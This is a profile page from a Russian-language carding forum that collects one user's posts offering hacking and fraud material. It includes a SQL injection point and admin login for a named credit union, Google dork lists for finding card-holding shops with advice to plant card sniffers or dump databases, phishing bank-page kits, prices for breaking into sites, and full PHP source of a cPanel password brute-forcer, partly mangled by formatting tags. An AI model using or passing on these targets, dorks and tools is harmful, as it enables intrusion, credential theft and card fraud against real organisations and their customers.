Акция 2021: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию
Искать в
  • Ещё...
Поиск результатов, которые содержат...
Поиск результатов в...

опаsный

Пользователи
  • Публикаций

    12
  • Зарегистрирован

  • Посещение

Репутация

0 Neutral

Информация о опаsный

  • Звание
    Пользователь
  1. опаsный

    Выкладываем SQL иньекции.

    банк какой то MySQL >= 5.0, шелл заливается прямо через скуль. Так же уязвимы параметры куки инж+скуль куки инж Цитата ХтТп://altanafcu.org/products/product.php?id={Inj} Цитата account_types account_types_footnotes account_types_products certificate_rates,features footnotes,loan_rates loan_rates_products product_categories product_categories_solution_center_links products products_certificate_rates products_saving_rates rate_categories,saving_rates solution_center_links test users админка Цитата hХтТпs://altanafcu.org/admin/login admin:[email protected]
  2. опаsный

    Выкладываем дорки

    PHP код: inurl:".php?cat="+intext:"Paypal"+site:UK inurl:".php?cat="+intext:"/Buy Now/"+site:.net inurl:".php?cid="+intext:"online+betting" inurl:".php?id=" intext:"View cart" inurl:".php?id=" intext:"Buy Now" inurl:".php?id=" intext:"add to cart" inurl:".php?id=" intext:"shopping" inurl:".php?id=" intext:"boutique" inurl:".php?id=" intext:"/store/" inurl:".php?id=" intext:"/shop/" inurl:".php?id=" intext:"toys" inurl:".php?cid=" inurl:".php?cid=" intext:"shopping" inurl:".php?cid=" intext:"add to cart" inurl:".php?cid=" intext:"Buy Now" inurl:".php?cid=" intext:"View cart" inurl:".php?cid=" intext:"boutique" inurl:".php?cid=" intext:"/store/" inurl:".php?cid=" intext:"/shop/" inurl:".php?cid=" intext:"Toys" inurl:".php?cat=" inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys" inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".asp?id=" intext:"Buy Now" inurl:".asp?id=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" кто хочет попытать счастья в сливе картона запомните. скажу словами обывателя чтоб понятно было. Там где дорки идут вида .php?id= тоже бывает картон, но он не храниться в шопах. Надо ставить сниф перехватчик сс. Эти шопы идут на MySql . Там же где идет дорка .asp - там может хранится картон, но надо залить шелл, и дампануть БД. Это шопы на mssql. Во втором случае, крутить надо руками, а не хавиджами всякимиimages/smilies/smile.gif
  3. опаsный

    Небольшой вопрос.

    Цитата Сообщение от lastexile поэтому лично я не давал бы больше 0.1-0.2$ за отклик в зависимости от страны = 30-100$ в день. солидарен. Цитата Сообщение от lastexile с точки зрения набора отклика: ручной набор практически всегда прибыльнее и качественнее, чем отклик со спама спам - шлак. спам можно пускать только под дешевый фишинг. На отклики лучше ручками - эффект непередаваемый.
  4. опаsный

    Движок форума XenForo,взламывали?

    Цитата Сообщение от Psihodel люди которые там сидят впринципе могут скинуться,чтобы вернуть себе обратно его. могу пораскинуть руками - что не скинутся, надо будет менять от домена до полностью геолокации images/smilies/biggrin.gif пока не найдешь их снова и не покажешь линк на них.
  5. опаsный

    SQLI Hunter 1.1

    SQLI Hunter софт для автоматизации сканирования на уязвимости и поиска по доркам через всеми любимый гугл В SQLI Hunter также включена фишка поиска админки сайта (админ файндер) Простой в использовании! Особенности: - - Теперь поддерживается 500 результатов - Url список можно импортировать / экспортировать - Установка для тайм-аут соединения Под софт требуется. NET Framework 3.5 Скачать можно тут http://sourceforge.n...cts/sqlihunter/
  6. опаsный

    Движок форума XenForo,взламывали?

    цена вопроса? Или у тебя вопрос чисто спортивный познавательный? Если да, то лучший совет на сегодня, зайти во вражескую територию, проанализировать все + и - и начни пробоывать. Взломать можно все (если брать в купе к примеру элементарные познания в sql php) и хотя бы знать пару методов взлома на элементарном уровне (такие как скуль инж и xss) + баги форумного движка, которые палят сами админы форумов Вот смотри разбираются люди ТЫЦ Это часть команды булки. Если булку ломят - то ксенфора тоже не далеко упала от яблониimages/smilies/smile.gif
  7. опаsный

    фейки платежек

    Привет всем. Х.з. туда запостил или нет, заранее извиняюся, но думаю, что туда. Сборничег фейков под развод: банки и платежки UK банк hsbh Испания - Валенсия, Сант-андер,ОпенБанк, Bbva Аргентина - Стандарт Банк Австралия - Национальный Австралийский Чили Paypal (комбинированый вариан под страны) ХтТп://www.sendspace.com/file/btiou1
  8. от сайта зависит. Сначало дается задание, что необходимо получить в итоге. Заказчик перечисляет те действия и результат заранее, который он хочет получить. Далее, пентестер(взломщик,хакер) анализирует смотрит сайт ( от 10 минут до часу). В зависимости от адекватности, от степени жадности хакера, от опасности выполняемой работы, назначается цена. Т.е. за шоп амерский с базой юзверей может цена быть в 5 раз дешевле, чем простой дефейс ("порча") сайта на домене .gov Разные факторы карочь. От распространенности движка сайта, до затраченного времени. Протестировать на уязвимости сайт средней сложности 250-350 $ ( не входит сам слив, дамп, дефейс, активное использование уязвимостей) (Протестировать на баги и непосредственно залатать все "дыры" - уже от 350$). Взломать сайт средней сложности (самопис) 350-500$ (входит использование уязвимости и от поставленой задачи заказчика, слить,дампануть,продефейсить, т.е. показать клиенту, что его сайт вполне реально слить и сделать разного рода пакости). Я просто отписал 2 примера, с 2 примерными ценами. Первый пример тест, второй непосредственно взлом. Если заказчику не устраивает обоснованые хакером баги, которые он выявил, хакер в праве доказать обратно - продефейсив сайт заказчику, тем самым показав опасность выявленой уязвимости. П.с. у меня был случай один, заказали мне шоп сначало протестить, потом ломануть, слить базу. Начали рассказывать, что это их конкуренты. Я уточнил - ломаю ONLY сайт и сливаю ONLY базу данных? На что получил ответ - да, только базу этого сайта. Ну ок так ок. Цена 350 говорю. Слил, даю человеку. Он начинает матерится,что я некачественно исполнил работу. спрашиваю - WTF уважаемый? Ответ убил. Клиент:- "Мне надо была база картона, этот шоп посещаемый в германии, а тут блять какие то мыла, пароли к аккам, IP время реги захожы". Мои доводы того, что в шопе работает сторонний мерч приема оплаты, и что надо было уточнить, что интересны СС и че то еще заранее, а не я должен был гадать, ставить ли снифер на шоп, чтоб слить сс или ему эти сс и нах не нужны, читос база конкурентов с мейлами шоповских клиентов) Т.е. вывод : заранее уточняем цель работы и итог получения этой цели, с перечислением, какой необходим результат! Надо тест, пишем, у меня работа с базой, или с чем у вас, мне надо глянуть уязвимости.
  9. опаsный

    Dork парсер на питоне

    Сабж. Заметил, что беспокоит многих вопрос чем парсить выдачу с гугла и т.д. Скидываю парсер дорков через разные поисковики на питоне. Интуитивно все понятно. Особенность парсера: - гибкая настройка (с каких поисковиков хотим парсить,глубина парсинга) - чек линков на PR ТИЦ после парсинга на автомате - нету блока по ИП (парсит не напрямую с гугла яхи и т.д.) Небольшое оружие для охотников за шеллами images/smilies/biggrin.gif ХтТп://www.sendspace.com/file/t9tpec
  10. опаsный

    Почитать на досуге.

    Книга на английском языке, для будущих предпринимателей , админов и прочих личностей, кто будет связан с защитой кредитных карт(прием обработка,написания скриптов для приема, шопы и т.д.). Методы обнаружения возможных способов слива картона, обнаружение фрода и т.д. Книга продавалась в одном онлайн шопе. Была куплена за одну из слитых сс с соседа - хоста images/smilies/biggrin.gif images/smilies/biggrin.gif images/smilies/biggrin.gif В книге гон, но в ней намек, добрым молодцам урок. П.с. мало хранят сс шопы. Ломайте и ставьте сниф на перехват и будет счастье вам. Скачать ХтТп://www.sendspace.com/file/xo69lf
  11. опаsный

    Cpanel Cracker

    Собствено на пехэ сделаный брутер "крякер" cPanel Норм вещь, особено если нету больше вариков ломануть сайтец. Вот видео про него как оно работает. ВИДЕО А вот он сам PHP код: <?php set_time_limit(0); /******************************************************************** * Private Cpanel Cracker * Coded by Miyachung * [email protected] * Janissaries.Org * Demonstration -> *********************************************************************/ class cracker { public $sitelist; public $passlist; public function calis() { $usernames = $this->make_username(); $sitelist = explode(" ",$this->openfile($this->sitelist)); $passlist = explode(" ",$this->openfile($this->passlist)); $increment = 0; echo " [*]Site list -> $this->sitelist "; echo "[*]Pass list -> $this->passlist "; echo "[*]Total urls -> ".count($sitelist)." "; echo "[*]Total pass -> ".count($passlist)." "; echo "[*]Cracking started "; foreach($sitelist as $id => $site) { $increment++; $site = trim($site); echo "------------------------------------------------------- "; echo "[*]Trying site: ".$site." $increment / ".count($sitelist)." "; if(eregi('http',$site)){ $site = str_replace("http://","https://",$site); }else{ $site = "https://$site"; } $site= $site.":2083"; if(!$this->pass_site($site)) { echo "[-]Not cpanel,passing site "; echo "------------------------------------------------------- "; continue; } echo "[*]Connected Cpanel [OK] "; echo "[*]Username: ".$usernames[$id]." "; echo "[*]Loaded ".count($passlist)." passwords "; echo "[*]Coded by Miyachung ||| Janissaries.Org "; foreach($passlist as $pass) { $cracked = false; $pass=trim($pass); $result = $this->post($site,$usernames[$id],$pass); if(preg_match('/security_token/',$result)) { $cracked = true; echo "[+]$pass password cracked for $usernames[$id] "; echo "------------------------------------------------------- "; $this->savefile("$site|$usernames[$id]|$pass"); break; } } if(!$cracked){echo "[-]Not found ";echo "------------------------------------------------------- ";} } } private function make_username() { $op = explode(" ",$this->openfile($this->sitelist)); foreach($op as $site) { if(eregi('http://',$site)) $site = str_replace("http://","",$site); if(!eregi('www',$site)) $site = "www.".$site; $site = explode(".",$site); $site = str_replace("-","",$site[1]); $usernames[] = substr($site,0,8); } return $usernames; } public function lists() { echo "[!]Site list: "; $sitelist = fgets(STDIN); $sitelist = str_replace(" ","",$sitelist); $sitelist = trim($sitelist); echo "[!]Pass list: "; $passlist = fgets(STDIN); $passlist = str_replace(" ","",$passlist); $passlist = trim($passlist); return array($sitelist,$passlist); } private function post($site,$user,$pass) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1"); curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl,CURLOPT_TIMEOUT,7); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass"); $exec = curl_exec($curl); return $exec; } private function pass_site($site) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_URL,$site); curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl,[color=#0000BB]CURLOPT_SSL_VERIFYPEER[color=#007700],[/color][color=#0000BB]0[/color][color=#007700]); [/color][color=#0000BB]curl_setopt[/color][color=#007700]([/color][color=#0000BB]$curl[/color][color=#007700],[/color][color=#0000BB]CURLOPT_FOLLOWLOCATION[/color][color=#007700],[/color][color=#0000BB]true[/color][color=#007700]); [/color][color=#0000BB]curl_setopt[/color][color=#007700]([/color][color=#0000BB]$curl[/color][color=#007700],[/color][color=#0000BB]CURLOPT_TIMEOUT[/color][color=#007700],[/color][color=#0000BB]7[/color][color=#007700]); [/color][color=#0000BB]$exec [/color][color=#007700]= [/color][color=#0000BB]curl_exec[/color][color=#007700]([/color][color=#0000BB]$curl[/color][color=#007700]); [/color][color=#0000BB]$info [/color][color=#007700]= [/color][color=#0000BB]curl_getinfo[/color][color=#007700]([/color][color=#0000BB]$curl[/color][color=#007700]); if([/color][color=#0000BB]$info[/color][color=#007700][[/color][color=#DD0000]'http_code'[/color][color=#007700]] != [/color][color=#0000BB]0[/color][color=#007700]) { return [/color][color=#0000BB]true[/color][color=#007700]; } else { return [/color][color=#0000BB]false[/color][color=#007700]; } } private function [/color][color=#0000BB]openfile[/color][color=#007700]([/color][color=#0000BB]$file[/color][color=#007700]) { [/color][color=#0000BB]$file [/color][color=#007700]= @[/color][color=#0000BB]file_get_contents[/color][color=#007700]([/color][color=#0000BB]$file[/color][color=#007700]); if(![/color][color=#0000BB]$file[/color][color=#007700]) exit([/color][color=#DD0000]"WTF File not found ?"[/color][color=#007700]); return [/color][color=#0000BB]$file[/color][color=#007700]; } private function [/color][color=#0000BB]savefile[/color][color=#007700]([/color][color=#0000BB]$content[/color][color=#007700]) { [/color][color=#0000BB]$file [/color][color=#007700]= [/color][color=#0000BB]fopen[/color][color=#007700]([/color][color=#DD0000]'crackerlog.txt'[/color][color=#007700],[/color][color=#DD0000]'ab'[/color][color=#007700]); [/color][color=#0000BB]fwrite[/color][color=#007700]([/color][color=#0000BB]$file[/color][color=#007700],[/color][color=#0000BB]$content[/color][color=#007700].[/color][color=#DD0000]" "[/color][color=#007700]); [/color][color=#0000BB]fclose[/color][color=#007700]([/color][color=#0000BB]$file[/color][color=#007700]); return [/color][color=#0000BB]$file[/color][color=#007700]; } } [/color] [color=#0000BB]$class [/color][color=#007700]= new [/color][color=#0000BB]cracker[/color][color=#007700](); [/color] [color=#0000BB]$lists [/color][color=#007700]= [/color][color=#0000BB]$class[/color][color=#007700]->[/color][color=#0000BB]lists[/color][color=#007700](); if(empty([/color][color=#0000BB]$lists[/color][color=#007700][[/color][color=#0000BB]0[/color][color=#007700]]) || empty([/color][color=#0000BB]$lists[/color][color=#007700][[/color][color=#0000BB]1[/color][color=#007700]])) exit([/color][color=#DD0000]"WTF Empty ? "[/color][color=#007700]); [/color] [color=#0000BB]$class[/color][color=#007700]->[/color][color=#0000BB]sitelist [/color][color=#007700]= [/color][color=#0000BB]$lists[/color][color=#007700][[/color][color=#0000BB]0[/color][color=#007700]]; [/color] [color=#0000BB]$class[/color][color=#007700]->[/color][color=#0000BB]passlist [/color][color=#007700]= [/color][color=#0000BB]$lists[/color][color=#007700][[/color][color=#0000BB]1[/color][color=#007700]]; [/color] [color=#0000BB]$class[/color][color=#007700]->[/color][color=#0000BB]calis[/color][color=#007700](); [/color] [color=#0000BB]?>[/color] [/color] Грузите на шелле данный сабж, ломайте больше панелек, и будет вам счастье! images/smilies/smile.gif
×